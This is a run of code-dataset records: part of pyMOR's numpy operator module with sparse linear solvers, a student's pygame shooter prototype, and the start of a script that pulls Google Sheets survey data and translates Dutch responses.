'solve'}),))\n\n def apply(self, U, ind=None, mu=None):\n if self._assembled:\n assert isinstance(U, NumpyVectorArray)\n assert self.check_parameter(mu)\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n return NumpyVectorArray(self._last_op._matrix.dot(U_array.T).T, copy=False)\n else:\n return self.assemble(mu).apply(U, ind=ind)\n\n def export_matrix(self, filename, matrix_name=None, format='matlab', mu=None):\n '''Save matrix of operator to a file.\n\n Parameters\n ----------\n filename\n Name of output file.\n matrix_name\n The name, the output matrix is given. (Comment field is used in\n case of Matrix Market format.) If `None`, the |Operator|'s `name`\n is used.\n format\n Output file format. Either `matlab` or `matrixmarket`.\n '''\n assert format in {'matlab', 'matrixmarket'}\n matrix = self.assemble(mu)._matrix\n matrix_name = matrix_name or self.name\n if format is 'matlab':\n savemat(filename, {matrix_name: matrix})\n else:\n mmwrite(filename, matrix, comment=matrix_name)\n\n\nclass NumpyMatrixOperator(NumpyMatrixBasedOperator):\n '''Wraps a 2D |NumPy Array| as a proper |Operator|.\n\n Parameters\n ----------\n matrix\n The |NumPy array| which is to be wrapped.\n name\n Name of the operator.\n '''\n\n assembled = True\n calculate_sid = False\n\n def __init__(self, matrix, name=None):\n assert matrix.ndim <= 2\n if matrix.ndim == 1:\n matrix = np.reshape(matrix, (1, -1))\n self.dim_source = matrix.shape[1]\n self.dim_range = matrix.shape[0]\n self.name = name\n self._matrix = matrix\n self.sparse = issparse(matrix)\n self.calculate_sid = hasattr(matrix, 'sid')\n\n def _assemble(self, mu=None):\n assert self.check_parameter(mu)\n return self\n\n def assemble(self, mu=None):\n assert self.check_parameter(mu)\n return self\n\n def as_vector(self, mu=None):\n if self.dim_source != 1 and self.dim_range != 1:\n raise TypeError('This operator does not represent a vector or linear functional.')\n assert self.check_parameter(mu)\n return NumpyVectorArray(self._matrix.ravel(), copy=True)\n\n def apply(self, U, ind=None, mu=None):\n assert isinstance(U, NumpyVectorArray)\n assert self.check_parameter(mu)\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n return NumpyVectorArray(self._matrix.dot(U_array.T).T, copy=False)\n\n def apply_inverse(self, U, ind=None, mu=None, options=None):\n\n default_options = self.invert_options\n\n if options is None:\n options = default_options.values()[0]\n elif isinstance(options, str):\n options = default_options[options]\n else:\n assert 'type' in options and options['type'] in default_options \\\n and options.viewkeys() <= default_options[options['type']].viewkeys()\n user_options = options\n options = default_options[user_options['type']]\n options.update(user_options)\n\n assert isinstance(U, NumpyVectorArray)\n assert self.dim_range == U.dim\n\n U = U._array[:U._len] if ind is None else U._array[ind]\n if U.shape[1] == 0:\n return NumpyVectorArray(U)\n R = np.empty((len(U), self.dim_source))\n\n if self.sparse:\n if options['type'] == 'bicgstab':\n for i, UU in enumerate(U):\n R[i], info = bicgstab(self._matrix, UU, tol=options['tol'], maxiter=options['maxiter'])\n if info != 0:\n if info > 0:\n raise InversionError('bicgstab failed to converge after {} iterations'.format(info))\n else:\n raise InversionError('bicgstab failed with error code {} (illegal input or breakdown)'.\n format(info))\n elif options['type'] == 'bicgstab-spilu':\n ilu = spilu(self._matrix, drop_tol=options['spilu_drop_tol'], fill_factor=options['spilu_fill_factor'],\n drop_rule=options['spilu_drop_rule'], permc_spec=options['spilu_permc_spec'])\n precond = LinearOperator(self._matrix.shape, ilu.solve)\n for i, UU in enumerate(U):\n R[i], info = bicgstab(self._matrix, UU, tol=options['tol'], maxiter=options['maxiter'], M=precond)\n if info != 0:\n if info > 0:\n raise InversionError('bicgstab failed to converge after {} iterations'.format(info))\n else:\n raise InversionError('bicgstab failed with error code {} (illegal input or breakdown)'.\n format(info))\n elif options['type'] == 'spsolve':\n for i, UU in enumerate(U):\n R[i] = spsolve(self._matrix, UU, permc_spec=options['permc_spec'])\n elif options['type'] == 'pyamg':\n if len(U) > 0:\n U_iter = iter(enumerate(U))\n R[0], ml = pyamg.solve(self._matrix, next(U_iter)[1],\n tol=options['tol'],\n maxiter=options['maxiter'],\n return_solver=True)\n for i, UU in U_iter:\n R[i] = pyamg.solve(self._matrix, UU,\n tol=options['tol'],\n maxiter=options['maxiter'],\n existing_solver=ml)\n elif options['type'] == 'pyamg-rs':\n ml = pyamg.ruge_stuben_solver(self._matrix,\n strength=options['strength'],\n CF=options['CF'],\n presmoother=options['presmoother'],\n postsmoother=options['postsmoother'],\n max_levels=options['max_levels'],\n max_coarse=options['max_coarse'],\n coarse_solver=options['coarse_solver'])\n for i, UU in enumerate(U):\n R[i] = ml.solve(UU,\n tol=options['tol'],\n maxiter=options['maxiter'],\n cycle=options['cycle'],\n accel=options['accel'])\n elif options['type'] == 'pyamg-sa':\n ml = pyamg.smoothed_aggregation_solver(self._matrix,\n symmetry=options['symmetry'],\n strength=options['strength'],\n aggregate=options['aggregate'],\n smooth=options['smooth'],\n presmoother=options['presmoother'],\n postsmoother=options['postsmoother'],\n improve_candidates=options['improve_candidates'],\n max_levels=options['max_levels'],\n max_coarse=options['max_coarse'],\n diagonal_dominance=options['diagonal_dominance'])\n for i, UU in enumerate(U):\n R[i] = ml.solve(UU,\n tol=options['tol'],\n maxiter=options['maxiter'],\n cycle=options['cycle'],\n accel=options['accel'])\n else:\n raise ValueError('Unknown solver type')\n else:\n for i, UU in enumerate(U):\n try:\n R[i] = np.linalg.solve(self._matrix, UU)\n except np.linalg.LinAlgError as e:\n raise InversionError('{}: {}'.format(str(type(e)), str(e)))\n\n return NumpyVectorArray(R)\n\n def projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''Project the operator to a subbasis.\n\n The purpose of this method is to further project an operator that has been\n obtained through :meth:`~pymor.operators.interfaces.OperatorInterface.projected`\n to subbases of the original projection bases, i.e. ::\n\n op.projected(s_basis, r_basis, prod).projected_to_subbasis(dim_source, dim_range)\n\n should be the same as ::\n\n op.projected(s_basis.copy(range(dim_source)), r_basis.copy(range(dim_range)), prod)\n\n For a |NumpyMatrixOperator| this amounts to extracting the upper-left\n (dim_range, dim_source) corner of the matrix it wraps.\n\n Parameters\n ----------\n dim_source\n Dimension of the source subbasis.\n dim_range\n Dimension of the range subbasis.\n\n Returns\n -------\n The projected |Operator|.\n '''\n assert dim_source is None or dim_source <= self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n name = name or '{}_projected_to_subbasis'.format(self.name)\n return NumpyMatrixOperator(self._matrix[:dim_range, :dim_source], name=name)\n\n\nclass NumpyLincombMatrixOperator(NumpyMatrixBasedOperator, LincombOperatorBase):\n '''A |LincombOperator| representing a linear combination of |NumpyMatrixBasedOperators|.\n\n This class is not intended to be instantiated directly. Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.lincomb` method of the given\n |Operators|.\n\n Parameters\n ----------\n operators\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n num_coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients_name\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n name\n Name of the operator.\n '''\n\n def __init__(self, operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n assert all(isinstance(op, NumpyMatrixBasedOperator) for op in operators)\n super(NumpyLincombMatrixOperator, self).__init__(operators=operators, coefficients=coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n self.sparse = all(op.sparse for op in operators)\n\n def _assemble(self, mu=None):\n mu = self.parse_parameter(mu)\n ops = [op.assemble(mu) for op in self.operators]\n coeffs = self.evaluate_coefficients(mu)\n if coeffs[0] == 1:\n matrix = ops[0]._matrix.copy()\n else:\n matrix = ops[0]._matrix * coeffs[0]\n for op, c in izip(ops[1:], coeffs[1:]):\n if c == 1:\n try:\n matrix += op._matrix\n except NotImplementedError:\n matrix = matrix + op._matrix\n elif c == -1:\n try:\n matrix -= op._matrix\n except NotImplementedError:\n matrix = matrix - op._matrix\n else:\n try:\n matrix += (op._matrix * c)\n except NotImplementedError:\n matrix = matrix + (op._matrix * c)\n return NumpyMatrixOperator(matrix)\n\n\nclass ProjectedOperator(OperatorBase):\n '''Genric |Operator| for representing the projection of an |Operator| to a subspace.\n\n This class is not intended to be instantiated directly. Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.projected` method of the given\n |Operator|.\n\n Parameters\n ----------\n operator\n The |Operator| to project.\n source_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n range_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n product\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n copy\n If `True`, make a copy of the provided `source_basis` and `range_basis`. This is\n usually necessary, as |VectorArrays| are not immutable.\n name\n Name of the projected operator.\n '''\n\n type_source = type_range = NumpyVectorArray\n linear = False\n\n def __init__(self, operator, source_basis, range_basis, product=None, copy=True, name=None):\n assert isinstance(operator, OperatorInterface)\n assert isinstance(source_basis, operator.type_source) or issubclass(operator.type_source, NumpyVectorArray)\n assert issubclass(operator.type_range, type(range_basis)) or issubclass(operator.type_range, NumpyVectorArray)\n assert source_basis is None or source_basis.dim == operator.dim_source\n assert range_basis is None or range_basis.dim == operator.dim_range\n assert product is None \\\n or (isinstance(product, OperatorInterface)\n and range_basis is not None\n and issubclass(operator.type_range, product.type_source)\n and issubclass(product.type_range, type(product))\n and product.dim_range == product.dim_source == operator.dim_range)\n self.build_parameter_type(inherits=(operator,))\n self.dim_source = len(source_basis) if operator.dim_source > 0 else 0\n self.dim_range = len(range_basis) if range_basis is not None else operator.dim_range\n self.name = name\n self.operator = operator\n self.source_basis = source_basis.copy() if source_basis is not None and copy else source_basis\n self.range_basis = range_basis.copy() if range_basis is not None and copy else range_basis\n self.product = product\n\n def apply(self, U, ind=None, mu=None):\n mu = self.parse_parameter(mu)\n if self.source_basis is None:\n if self.range_basis is None:\n return self.operator.apply(U, ind=ind, mu=mu)\n elif self.product is None:\n return NumpyVectorArray(self.operator.apply2(self.range_basis, U, U_ind=ind, mu=mu, pairwise=False).T)\n else:\n V = self.operator.apply(U, ind=ind, mu=mu)\n return NumpyVectorArray(self.product.apply2(V, self.range_basis, pairwise=False))\n else:\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n UU = self.source_basis.lincomb(U_array)\n if self.range_basis is None:\n return self.operator.apply(UU, mu=mu)\n elif self.product is None:\n return NumpyVectorArray(self.operator.apply2(self.range_basis, UU, mu=mu, pairwise=False).T)\n else:\n V = self.operator.apply(UU, mu=mu)\n return NumpyVectorArray(self.product.apply2(V, self.range_basis, pairwise=False))\n\n def projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''See :meth:`NumpyMatrixOperator.projected_to_subbasis`.'''\n assert dim_source is None or dim_source <= self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n assert dim_source is None or self.source_basis is not None, 'not implemented'\n assert dim_range is None or self.range_basis is not None, 'not implemented'\n name = name or '{}_projected_to_subbasis'.format(self.name)\n source_basis = self.source_basis if dim_source is None \\\n else self.source_basis.copy(ind=range(dim_source))\n range_basis = self.range_basis if dim_range is None \\\n else self.range_basis.copy(ind=range(dim_range))\n return ProjectedOperator(self.operator, source_basis, range_basis, product=None, copy=False, name=name)\n\n def jacobian(self, U, mu=None):\n assert len(U) == 1\n mu = self.parse_parameter(mu)\n if self.source_basis is None:\n J = self.operator.jacobian(U, mu=mu)\n else:\n J = self.operator.jacobian(self.source_basis.lincomb(U.data), mu=mu)\n return ProjectedLinearOperator(J, source_basis=self.source_basis, range_basis=self.range_basis,\n product=self.product, copy=False, name=self.name + '_jacobian').assemble()\n\n\nclass ProjectedLinearOperator(NumpyMatrixBasedOperator):\n '''Genric |Operator| for representing the projection of a linear |Operator| to a subspace.\n\n This class is not intended to be instantiated directly. Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.projected` method of the given\n |Operator|.\n\n Parameters\n ----------\n operator\n The |Operator| to project.\n source_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n range_basis\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n product\n See :meth:`~pymor.operators.interfaces.OperatorInterface.projected`.\n copy\n If `True`, make a copy of the provided `source_basis` and `range_basis`. This is\n usually necessary, as |VectorArrays| are not immutable.\n name\n Name of the projected operator.\n '''\n\n sparse = False\n\n def __init__(self, operator, source_basis, range_basis, product=None, name=None, copy=True):\n assert isinstance(operator, OperatorInterface)\n assert isinstance(source_basis, operator.type_source) or issubclass(operator.type_source, NumpyVectorArray)\n assert issubclass(operator.type_range, type(range_basis)) or issubclass(operator.type_range, NumpyVectorArray)\n assert source_basis is None or source_basis.dim == operator.dim_source\n assert range_basis is None or range_basis.dim == operator.dim_range\n assert product is None \\\n or (isinstance(product, OperatorInterface)\n and range_basis is not None\n and issubclass(operator.type_range, product.type_source)\n and issubclass(product.type_range, type(product))\n and product.dim_range == product.dim_source == operator.dim_range)\n assert operator.linear\n self.build_parameter_type(inherits=(operator,))\n self.dim_source = len(source_basis) if source_basis is not None else operator.dim_source\n self.dim_range = len(range_basis) if range_basis is not None else operator.dim_range\n self.name = name\n self.operator = operator\n self.source_basis = source_basis.copy() if source_basis is not None and copy else source_basis\n self.range_basis = range_basis.copy() if range_basis is not None and copy else range_basis\n self.product = product\n\n def _assemble(self, mu=None):\n mu = self.parse_parameter(mu)\n if self.source_basis is None:\n if self.range_basis is None:\n return self.operator.assemble(mu=mu)\n elif self.product is None:\n return NumpyMatrixOperator(self.operator.apply2(self.range_basis,\n NumpyVectorArray(np.eye(self.operator.dim_source)),\n pairwise=False, mu=mu),\n name='{}_assembled'.format(self.name))\n else:\n V = self.operator.apply(NumpyVectorArray(np.eye(self.operator.dim_source)), mu=mu)\n return NumpyMatrixOperator(self.product.apply2(self.range_basis, V, pairwise=False),\n name='{}_assembled'.format(self.name))\n else:\n if self.range_basis is None:\n M = self.operator.apply(self.source_basis, mu=mu).data.T\n return NumpyMatrixOperator(M, name='{}_assembled'.format(self.name))\n elif self.product is None:\n return NumpyMatrixOperator(self.operator.apply2(self.range_basis, self.source_basis, mu=mu,\n pairwise=False),\n name='{}_assembled'.format(self.name))\n else:\n V = self.operator.apply(self.source_basis, mu=mu)\n return NumpyMatrixOperator(self.product.apply2(self.range_basis, V, pairwise=False),\n name='{}_assembled'.format(self.name))\n\n def projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''See :meth:`NumpyMatrixOperator.projected_to_subbasis`.'''\n assert dim_source is None or dim_source <= self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n assert dim_source is None or self.source_basis is not None, 'not implemented'\n assert dim_range is None or self.range_basis is not None, 'not implemented'\n name = name or '{}_projected_to_subbasis'.format(self.name)\n source_basis = self.source_basis if dim_source is None \\\n else self.source_basis.copy(ind=range(dim_source))\n range_basis = self.range_basis if dim_range is None \\\n else self.range_basis.copy(ind=range(dim_range))\n return ProjectedLinearOperator(self.operator, source_basis, range_basis, product=None, copy=False, name=name)\n\n\nclass LincombOperator(LincombOperatorBase):\n '''A generic |LincombOperator| representing a linear combination of arbitrary |Operators|.\n\n This class is not intended to be instantiated directly. Instead, you should use\n the :meth:`~pymor.operators.interfaces.OperatorInterface.lincomb` method of the given\n |Operators|.\n\n Parameters\n ----------\n operators\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n num_coefficients\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n coefficients_name\n See :meth:`pymor.operator.interfaces.OperatorInterface.lincomb`.\n name\n Name of the operator.\n '''\n\n def __init__(self, operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n super(LincombOperator, self).__init__(operators=operators, coefficients=coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n\n def apply(self, U, ind=None, mu=None):\n mu = self.parse_parameter(mu)\n coeffs = self.evaluate_coefficients(mu)\n Vs = [op.apply(U, ind=ind, mu=mu) for op in self.operators]\n R = Vs[0]\n R.scal(coeffs[0])\n for V, c in izip(Vs[1:], coeffs[1:]):\n R.axpy(c, V)\n return R\n","sub_path":"src/pymor/operators/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":44042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"577387618","text":"'''\npygamegame.py\ncreated by Lukas Peraza\n for 15-112 F15 Pygame Optional Lecture, 11/11/15\nuse this code in your term project if you want\n- CITE IT\n- you can modify it to your liking\n - BUT STILL CITE IT\n- you should remove the print calls from any function you aren't using\n- you might want to move the pygame.display.flip() to your redrawAll function,\n in case you don't need to update the entire display every frame (then you\n should use pygame.display.update(Rect) instead)\n'''\nimport pygame\nimport os\nimport random\nimport math\nfrom Walls import *\nfrom Weapons import *\nfrom Player import *\n\n\nclass Monster(pygame.sprite.Sprite):\n def __init__(self, x, y, speed):\n super(Bullet,self).__init__()\n self.x = x\n self.y = y\n self.speed = speed\n self.image = None\n self.rect = pygame.Rect(self.x-2,self.y-2,4,4)\n self.size = self.image.get_size()\n self.bigger_img = pygame.transform.scale(self.image, (int(self.size[0]*2), int(self.size[1]*2)))\n self.image = self.bigger_img\n def getRect(self):\n self.rect = pygame.Rect(self.x,self.y,4,4)\n def update(self):\n self.x += self.speed*self.direction[0]\n self.y += self.speed*self.direction[1]\n self.getRect()\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y, speed, direction):\n super(Bullet,self).__init__()\n self.x = x\n self.y = y\n self.baseX = x\n self.baseY = y\n self.speed = speed\n self.direction = direction\n self.image = pygame.image.load(os.path.join(\"spriteAssets\",\"bullet.png\"))\n self.rect = pygame.Rect(self.x-2,self.y-2,4,4)\n self.size = self.image.get_size()\n self.bigger_img = pygame.transform.scale(self.image, (int(self.size[0]*2), int(self.size[1]*2)))\n self.image = self.bigger_img\n def getRect(self):\n self.rect = pygame.Rect(self.x-2,self.y-2,4,4)\n def update(self,dx,dy):\n self.baseX += self.speed*self.direction[0]\n self.baseY += self.speed*self.direction[1]\n self.x = self.baseX + dx\n self.y = self.baseY + dy\n self.getRect()\n\nclass Pointer(pygame.sprite.Sprite):\n def __init__(self, x, y):\n super(Pointer,self).__init__()\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x,self.y,16,16)\n self.image = pygame.image.load(os.path.join(\"spriteAssets\",\"pointer.png\"))\n def getRect(self): # GET REKT\n self.rect = pygame.Rect(self.x,self.y,16,16)\n def update(self):\n self.getRect()\n\nclass PygameGame(object):\n\n def init(self):\n ##Player##\n self.p = Player(300,200)\n self.dir = \"Right\"\n self.playerGroup = pygame.sprite.Group()\n self.playerGroup.add(self.p)\n ##Wand##\n self.wand = Wand(self.p.x,self.p.y)\n self.wandGroup = pygame.sprite.Group()\n self.wandGroup.add(self.wand)\n ##Pointer##\n self.Pointer = Pointer(0,0)\n self.PointerGroup = pygame.sprite.Group()\n self.PointerGroup.add(self.Pointer)\n ##Bullets##\n self.bulletGroup = pygame.sprite.Group()\n ##Left Walls##\n self.leftWallGroup = pygame.sprite.Group()\n self.leftWallGroup.add(LeftWall(24,24,\"Top1\"))\n self.leftWallGroup.add(LeftWall(24,48,\"Top2\"))\n for i in range(3,15):\n x, y = 0, i*24\n self.leftWallGroup.add(LeftWall(24,y,\"Mid\"))\n self.leftWallGroup.add(LeftWall(24,360,\"Bot1\"))\n self.leftWallGroup.add(LeftWall(24,384,\"Bot2\"))\n ##Right Walls##\n self.rightWallGroup = pygame.sprite.Group()\n self.rightWallGroup.add(RightWall(552,24,\"Top1\"))\n self.rightWallGroup.add(RightWall(552,48,\"Top2\"))\n for i in range(3,15):\n x, y = 0, i*24\n self.rightWallGroup.add(RightWall(552,y,\"Mid\"))\n self.rightWallGroup.add(RightWall(552,360,\"Bot1\"))\n self.rightWallGroup.add(RightWall(552,384,\"Bot2\"))\n ##Mid Walls##\n self.midWallTopGroup = pygame.sprite.Group()\n self.midWallBotGroup = pygame.sprite.Group()\n for i in range(22):\n self.midWallTopGroup.add(MidWall(48+i*24,24,\"Top1\"))\n self.midWallTopGroup.add(MidWall(48+i*24,48,\"Top2\"))\n for i in range(22):\n self.midWallBotGroup.add(MidWall(48+i*24,360,\"Bot1\"))\n self.midWallBotGroup.add(MidWall(48+i*24,384,\"Bot2\"))\n ##Floors##\n self.floorGroup = pygame.sprite.Group()\n for row in range(23):\n for col in range(3,16):\n self.floorGroup.add(Floor(24+row*24,col*24))\n ##MISC.##\n self.dirx = 1\n self.diry = 1\n self.mouseX = 0\n self.mouseY = 0\n self.mouseAngle = 0\n self.xMargin = 0\n self.yMargin = 0\n pass\n\n def mousePressed(self, x, y):\n dirx = x-self.p.x\n diry = y-self.p.y\n l = math.sqrt(dirx**2 + diry**2)\n direction = [(x-self.p.x)/l,(y-self.p.y)/l]\n self.bulletGroup.add(Bullet(self.p.x-self.xMargin,self.p.y-self.yMargin,5,direction))\n self.bulletGroup.update(self.xMargin,self.yMargin)\n # self.p.x -= 6*direction[0]\n # self.p.y -= 6*direction[1]\n # if pygame.sprite.groupcollide(self.leftWallGroup,self.playerGroup,False,False) != {}:\n # self.p.x += 6*direction[0]\n # if pygame.sprite.groupcollide(self.rightWallGroup,self.playerGroup,False,False) != {}:\n # self.p.x += 6*direction[0]\n pass\n\n def mouseReleased(self, x, y):\n pass\n\n def mouseMotion(self, x, y):\n self.mouseX = x\n self.mouseY = y\n dirx = self.dirx\n diry = self.diry\n l = math.sqrt(dirx**2 + diry**2)\n direction = [(x-self.p.x)/l,(y-self.p.y)/l]\n angle = 0\n if direction[0] != 0 and direction[0] > 0 and direction[1] < 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0]))\n elif direction[0] != 0 and direction[0] < 0 and direction[1] < 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0])+180)\n elif direction[0] < 0 and direction[1] > 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0])+180)\n elif direction[0] != 0 and direction[1] != 0:\n angle = ((-180/math.pi)*math.atan(direction[1]/direction[0])+360)\n elif math.isclose(direction[0],0):\n if direction[1] > 0:\n angle = 270\n else:\n angle = 90\n elif math.isclose(direction[1],0):\n if direction[0] < 0:\n angle = 180\n self.wand.rotateImage(angle)\n self.mouseAngle = angle\n\n self.Pointer.x = x-8\n self.Pointer.y = y-8\n if x>self.p.x:\n self.dir = \"Right\"\n else:\n self.dir = \"Left\"\n pass\n\n def mouseDrag(self, x, y):\n pass\n\n def keyPressed(self, keyCode, modifier):\n if keyCode == pygame.K_a:\n self.p.xSpeed = -3\n if keyCode == pygame.K_d:\n self.p.xSpeed = 3\n if keyCode == pygame.K_w:\n self.p.ySpeed = -3\n if keyCode == pygame.K_s:\n self.p.ySpeed = 3\n pass\n\n def keyReleased(self, keyCode, modifier):\n if keyCode == pygame.K_a:\n if self.p.xSpeed != 3:\n self.p.xSpeed = 0\n if keyCode == pygame.K_d:\n if self.p.xSpeed != -3:\n self.p.xSpeed = 0\n if keyCode == pygame.K_w:\n if self.p.ySpeed != 3:\n self.p.ySpeed = 0\n if keyCode == pygame.K_s:\n if self.p.ySpeed != -3:\n self.p.ySpeed = 0\n pass\n\n def timerFired(self, dt):\n ##Player Position##\n self.p.update()\n self.p.imageUpdate(self.dir)\n ##Player Collision##\n if pygame.sprite.groupcollide(self.leftWallGroup,self.playerGroup,False,False) != {}:\n self.xMargin += self.p.xSpeed\n if pygame.sprite.groupcollide(self.rightWallGroup,self.playerGroup,False,False) != {}:\n self.xMargin += self.p.xSpeed\n if pygame.sprite.groupcollide(self.midWallTopGroup,self.playerGroup,False,False) != {}:\n self.yMargin += self.p.ySpeed\n if pygame.sprite.groupcollide(self.midWallBotGroup,self.playerGroup,False,False) != {}:\n self.yMargin += self.p.ySpeed\n ##Margin Update##\n if self.p.x > 305 or self.p.x < 295 or self.p.y < 195 or self.p.y > 205:\n self.p.unupdate()\n self.xMargin -= self.p.xSpeed\n self.yMargin -= self.p.ySpeed\n self.leftWallGroup.update(self.xMargin,self.yMargin)\n self.rightWallGroup.update(self.xMargin,self.yMargin)\n self.midWallTopGroup.update(self.xMargin,self.yMargin)\n self.midWallBotGroup.update(self.xMargin,self.yMargin)\n self.floorGroup.update(self.xMargin,self.yMargin)\n self.bulletGroup.update(self.xMargin,self.yMargin)\n else:\n self.bulletGroup.update(self.xMargin,self.yMargin)\n ##Pointer##\n self.Pointer.update()\n ##Wand Rotation##\n self.wand.rotateUpdate(self.mouseX, self.mouseY, self.p.x, self.p.y)\n ##Bullet Collisions##\n pygame.sprite.groupcollide(self.leftWallGroup,self.bulletGroup,False,True)\n pygame.sprite.groupcollide(self.rightWallGroup,self.bulletGroup,False,True)\n pygame.sprite.groupcollide(self.midWallTopGroup,self.bulletGroup,False,True)\n pygame.sprite.groupcollide(self.midWallBotGroup,self.bulletGroup,False,True)\n \n pass\n\n def redrawAll(self, screen):\n screen.fill((45, 45, 45))\n ############################################################\n # pygame.draw.rect(screen, (200,200,200), self.p.rect)\n # pygame.draw.rect(screen, (200,200,200), self.Pointer.rect)\n ############################################################\n self.floorGroup.draw(screen)\n self.leftWallGroup.draw(screen)\n self.midWallTopGroup.draw(screen)\n self.midWallBotGroup.draw(screen)\n self.rightWallGroup.draw(screen)\n self.bulletGroup.draw(screen)\n if self.mouseAngle < 180:\n self.wandGroup.draw(screen)\n self.playerGroup.draw(screen)\n self.PointerGroup.draw(screen)\n if self.mouseAngle > 180:\n self.wandGroup.draw(screen)\n pass\n\n def isKeyPressed(self, key):\n ''' return whether a specific key is being held '''\n return self._keys.get(key, False)\n\n def __init__(self, width=600, height=504, fps=50, title=\"112 Pygame Game\"):\n self.width = width\n self.height = height\n self.fps = fps\n self.title = title\n self.bgColor = (255, 255, 255)\n pygame.init()\n\n def run(self):\n\n clock = pygame.time.Clock()\n screen = pygame.display.set_mode((self.width, self.height))\n # set the title of the window\n pygame.display.set_caption(self.title)\n\n # stores all the keys currently being held down\n self._keys = dict()\n\n # call game-specific initialization\n self.init()\n playing = True\n while playing:\n time = clock.tick(self.fps)\n self.timerFired(time)\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n self.mousePressed(*(event.pos))\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.mouseReleased(*(event.pos))\n elif (event.type == pygame.MOUSEMOTION and\n event.buttons == (0, 0, 0)):\n self.mouseMotion(*(event.pos))\n elif (event.type == pygame.MOUSEMOTION and\n event.buttons[0] == 1):\n self.mouseDrag(*(event.pos))\n elif event.type == pygame.KEYDOWN:\n self._keys[event.key] = True\n self.keyPressed(event.key, event.mod)\n elif event.type == pygame.KEYUP:\n self._keys[event.key] = False\n self.keyReleased(event.key, event.mod)\n elif event.type == pygame.QUIT:\n playing = False\n screen.fill(self.bgColor)\n self.redrawAll(screen)\n pygame.display.flip()\n\n pygame.quit()\n\n\ndef main():\n game = PygameGame()\n game.run()\n\nif __name__ == '__main__':\n main()","sub_path":"Prev. Versions/TP v.0.1.py","file_name":"TP v.0.1.py","file_ext":"py","file_size_in_byte":12544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"431823562","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 10:25:55 2019\n\n@author: FCRA\n\"\"\"\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nclass Survey_Analytics():\n \n def __init__(self):\n q1 = input(\"What is the parent question?\")\n q2 = input(\"What is the child question?\")\n self.q_parent = int(q1) \n self.q_child = int(q2)\n \n def get_gsheet(self, name):\n scope = [\"https://spreadsheets.google.com/feeds\",\"https://www.googleapis.com/auth/spreadsheets\",\"https://www.googleapis.com/auth/drive.file\",\"https://www.googleapis.com/auth/drive\"]\n creds = ServiceAccountCredentials.from_json_keyfile_name(\"credentials.json\", scope)\n client = gspread.authorize(creds)\n sheet = client.open(name).sheet1\n \n #retreive dataFrame and drop row of questions\n df = pd.DataFrame(sheet.get_all_values())\n \n #formatting dataframe\n df = df.drop(index=0).reset_index().drop(columns=\"index\")\n #formatting long response to fit into plot\n df.loc[df[7] == \"It depends on the service (please elaborate below)\", 7] = \"Depends on service\" \n df.loc[df[12] == \"Depending on the services offered (please specify below)\", 12] = \"Depends on service\"\n \n #saving local copy of dataframe\n df.to_csv(\"modified.csv\") #, index=False, sep='\\t') \n print(\"...Dataframe <<\"+name+\">> has been retreived\")\n return df\n \n \n def transl_dutch_df(self, df):\n \n #positive, negative, I don't know\n for i in list([2, 3]):\n df.loc[df[i] == \"Sterk positief\", i] = \"Very positive\"\n df.loc[df[i] == \"Positief\", i] = \"Positive\"\n df.loc[df[i] == \"Negatief\", i] = \"Negative\"\n df.loc[df[i] == \"Sterk negatief\", i] = \"Very negative\"\n #I dont know\n df.loc[df[i] == \"Geen antwoord\", i] = \"I don't know\"\n \n #likely, unlikely\n df.loc[df[4] == \"Hoogst onwaarschijnlijk\", 4] = \"Very unlikely\"\n df.loc[df[4] == \"Onwaarschijnlijk\", 4] = \"Unlikely\"\n df.loc[df[4] == \"Waarschijnlijk\", 4] = \"Likely\"\n df.loc[df[4] == \"Hoogst waarschijnlijk\", 4] = \"Very likely\"\n \n #Comfrotable, unconfortable\n for i in list([5, 6, 7]):\n df.loc[df[i] == \"Zeer oncomfortabel\", i] = \"Very uncomfortable\"\n df.loc[df[i] == \"Oncomfortabel\", i] = \"Uncomfortable\"\n df.loc[df[i] == \"Comfortabel\", i] = \"Comfortable\"\n 